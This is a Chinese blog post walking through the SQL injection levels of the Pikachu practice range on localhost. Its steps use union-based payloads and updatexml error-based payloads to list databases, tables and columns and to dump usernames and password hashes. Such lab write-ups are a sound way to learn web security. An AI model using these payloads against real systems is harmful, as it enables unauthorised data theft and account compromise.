pikachu靶场(sql注入通关教程-上)

最新推荐文章于 2024-07-23 16:52:49 发布
最新推荐文章于 2024-07-23 16:52:49 发布
阅读量944 收藏 19
点赞数 21
分类专栏: pikachu靶场 文章标签: sql 数据库 安全 pikachu靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74342020/article/details/139014219
版权

目录

1.数字型注入(post型)

1.打开网站,

2.打开抓包软件进行抓包, 

3.右键发送给Repeater ,打开Repeater

4.爆列数

5.看显位

6.爆数据库名

7.查表名

8.爆列名

9.爆数据

2.字符型注入(get) 

1.判断闭合符号

2.爆列数

3.看显位

4. 爆数据库名

5.查表名

6.爆列名

7.爆数据

3.搜索型注入

1.判断闭合符号

2.爆列数

 3.看显位

4. 爆数据库名

 5.查表名

后续操作与上述一样,这里不在重复。

4.xx型注入

1.判断闭合符号

2.爆列数

3.后续操作这里不在赘述。 

5."insert/update"注入

insert注入

1.首先注册用户

2.填写信息,进行抓包

​编辑3.修改信息,发送到repeater

4.爆表名

 5.爆列名

6.爆数据

update注入 

1.打开网站,注册登录

 2.修改个人信息

3.填入修改信息,抓包,发送到repeater

 4.输入注入语句

5.后续操作与insert注入一样 

1.数字型注入(post型)

1.打开网站,

2.打开抓包软件进行抓包, 

3.右键发送给Repeater ,打开Repeater

4.爆列数

修改post发送的值,点击Send,

id=1 order by 3 #&submit=%E6%9F%A5%E8%AF%A2

 

发现4超出范围,再试2 

页面显示正常,再试3 

超出范围。说明有两列。 

5.看显位

id=1 union select 1,2 #&submit=%E6%9F%A5%E8%AF%A2

修改为上述代码,Send

有两个位置, 回显

6.爆数据库名

id=1 union select 1,database() #&submit=%E6%9F%A5%E8%AF%A2

数据库名出现

7.查表名


id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="pikachu" #&submit=%E6%9F%A5%E8%AF%A2

表名出来了。

8.爆列名

id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema="pikachu" and table_name="users"#&submit=%E6%9F%A5%E8%AF%A2

9.爆数据

id=1 union select username,password from users #&submit=%E6%9F%A5%E8%AF%A2

查出来三组用户名与密码。  密码是md5加密的,拿去解密网站解密,得到

2.字符型注入(get) 

1.判断闭合符号

输入1点击查询,发现提交的1在url上

2. 在url上输入1'

'被编码成%27了

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27&submit=%E6%9F%A5%E8%AF%A2

把上述代码换成

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27--+&submit=%E6%9F%A5%E8%AF%A2

 

页面正常,说明闭合符号为'

2.爆列数

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27%20order%20by%203--+&submit=%E6%9F%A5%E8%AF%A2

 

3超出范围,试 2

页面正常

3.看显位

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27%20union%20select%201,2--+&submit=%E6%9F%A5%E8%AF%A2

 

4. 爆数据库名

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27%20union%20select%201,database()--+&submit=%E6%9F%A5%E8%AF%A2

5.查表名

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22pikachu%22--+&submit=%E6%9F%A5%E8%AF%A2

6.爆列名

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%22pikachu%22%20and%20table_name=%22users%22--+&submit=%E6%9F%A5%E8%AF%A2

7.爆数据

http://localhost:8086/pikachu-master/vul/sqli/sqli_str.php?name=1%27%20union%20select%20username,password%20from%20users--+&submit=%E6%9F%A5%E8%AF%A2

3.搜索型注入

1.判断闭合符号

输入1,发现页面显示正常

 输入1',发现报错

报错里面说,在%'处有错误,那我们输入1'%

 说明了闭合符号为%'

2.爆列数

http://localhost:8086/pikachu-master/vul/sqli/sqli_search.php?name=1%%27order%20by%204--+&submit=%E6%90%9C%E7%B4%A2#

4超出范围,试3

页面正常

 3.看显位

http://localhost:8086/pikachu-master/vul/sqli/sqli_search.php?name=1%%27union%20select%201,2,3--+&submit=%E6%90%9C%E7%B4%A2#

4. 爆数据库名

http://localhost:8086/pikachu-master/vul/sqli/sqli_search.php?name=1%%27union%20select%201,2,database()--+&submit=%E6%90%9C%E7%B4%A2#

 5.查表名

http://localhost:8086/pikachu-master/vul/sqli/sqli_search.php?name=1%%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22pikachu%22--+&submit=%E6%90%9C%E7%B4%A2#

后续操作与上述一样,这里不在重复。

4.xx型注入

1.判断闭合符号

打开网站输入1'

闭合符号为')

2.爆列数

http://localhost:8086/pikachu-master/vul/sqli/sqli_x.php?name=1%27)order%20by%202--+&submit=%E6%9F%A5%E8%AF%A2

3.后续操作这里不在赘述。 

5."insert/update"注入

insert注入

1.首先注册用户

2.填写信息,进行抓包

3.修改信息,发送到repeater

 'or updatexml(1,concat(0x7e,database()),1)or'

 

4.爆表名

去掉da 

 'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')),1)or'

可以看到最后一个没有显示完全,updatexml()能查询字符串的最大长度为32,,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位,也可以用limit函数

'or updatexml(1,substr(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')),31,63),1)or'

 5.爆列名

'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'pikachu'and table_name='users')),1)or'

 

6.爆数据

'or updatexml(1,concat(0x7e,(select group_concat(username) from users)),1)or'

可以看到有三个用户名,用同样的办法查出密码,若显示不全,则用substr函数截取。 

update注入 

1.打开网站,注册登录

 2.修改个人信息

3.填入修改信息,抓包,发送到repeater

修改发送的值

 4.输入注入语句

 'or updatexml(1,concat(0x7e,database()),1)or'

5.后续操作与insert注入一样 

月敛苏时意
关注
专栏目录
pikachu靶场通关记录
weixin_45682839的博客
04-01 2675
pikachu靶场通关记录
SQL注入-Pikachu靶场通关_pikachu靶场通关sql(1),网络安全应用开发基础大纲
m0_61369275的博客
04-06 833
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5149
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
【网络安全零基础入门必看】渗透测试之pikachu&DVWA靶场搭建教程,零基础入门到精通,收藏这一篇就够了
最新发布
2301_77472496的博客
07-23 1416
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习,下面和我一起搭建5个比较常用的初学者入门靶场
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 1913
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
SQL注入-Pikachu靶场通关
rumil的博客
08-21 2710
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶场通关sql注入
qq_74825121的博客
01-21 2742
pikachu靶场通关sql注入
pikachu靶场SQL注入
2303_79340715的博客
03-17 2223
个人觉得SQL注入还是挺难的,关键点在于找SQL语句的闭合,文章会比较长,要是能一关一关对着看的话,会对你有不少好处滴!!!当然啦,手搓重要,学会用sqlmap也是挺重要的哦,主要是我还不会~爆账号密码之类的信息再插一句:设置靶场的人已经告诉我们数据库是mysql了。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...
pikachu靶场sql注入
07-27
- *2* [pikachu靶场通关sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
pikachu靶场通关sql注入
08-10
Pikachu靶场中,SQL注入是一种常见的攻击方法。参与者可以通过注入恶意代码来绕过应用程序的安全性,从而获取敏感信息或者对数据库进行修改。在注入的过程中,可以使用不同的技术和payload来实现攻击。例如,数字...
Pikachu 靶场 SQL 注入通关解析
Flag少侠的博客
05-14 1884
SQL注入是一种安全漏洞,它可以允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。这种漏洞通常出现在需要用户输入数据并将其作为SQL查询的地方,如登录表单、搜索功能、用户注册等。SQL注入的原理是应用程序没有充分验证和过滤用户输入,而是将用户输入直接拼接到SQL查询中,从而导致恶意的SQL代码被执行。攻击者可以通过注入恶意代码来绕过身份验证、获取敏感数据、修改数据库内容或执行其他未经授权的操作。
Pikachu靶场sql注入通关
oiadkt的博客
03-07 5224
pickchusql注入通关
pikachu靶场
Fzuim的博客
11-21 3018
暴力破解 1. 基于表单的暴力破解 解题步骤: (一) 管理员账号admin尝试爆破,在密码处进行字典爆破 (二) 爆破出密码123456 2. 验证码绕过(on server) 解题步骤: (一) 题目漏洞点,在于验证码长久有效,同样进行burp抓包然后对密码位置进行爆破 (二) 保持一个正确验证码进行爆破,密码123456 3. 验证码绕过(on client) 解题步骤: (一) 题目漏洞点,在于验证码长久有效,同样进行burp抓包然后对密码位置进行爆破 (二
Pikachu靶场
m0_71518346的博客
12-08 442
token是在服务端产生的,前端使用账户密码向服务端请求认证,服务端认证成功,就会返回token给前端,前端每次请求时带上token证明自己的合法地位,如果token在服务端持久化就是一个永久的身份令牌。用户名和密码输入错误值,当验证码是错误值时,有弹框提示验证码错误,之前对用户名或密码的提示也没有清除,怀疑用户名和密码是在后端验证的,但验证码是在前端验证的。配置:发送到intruder中,清空所有选定变量,设置好password和username再添加一个token,攻击模式选Pitchfork。
pikachu靶场sql注入通关教程-下)
记录学习
05-19 532
pikachu靶场sql注入下)
Pikachu靶场--Sql Inject
qq_65150735的博客
06-30 1089
Pikachu靶场--Sql Inject(SQL注入)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值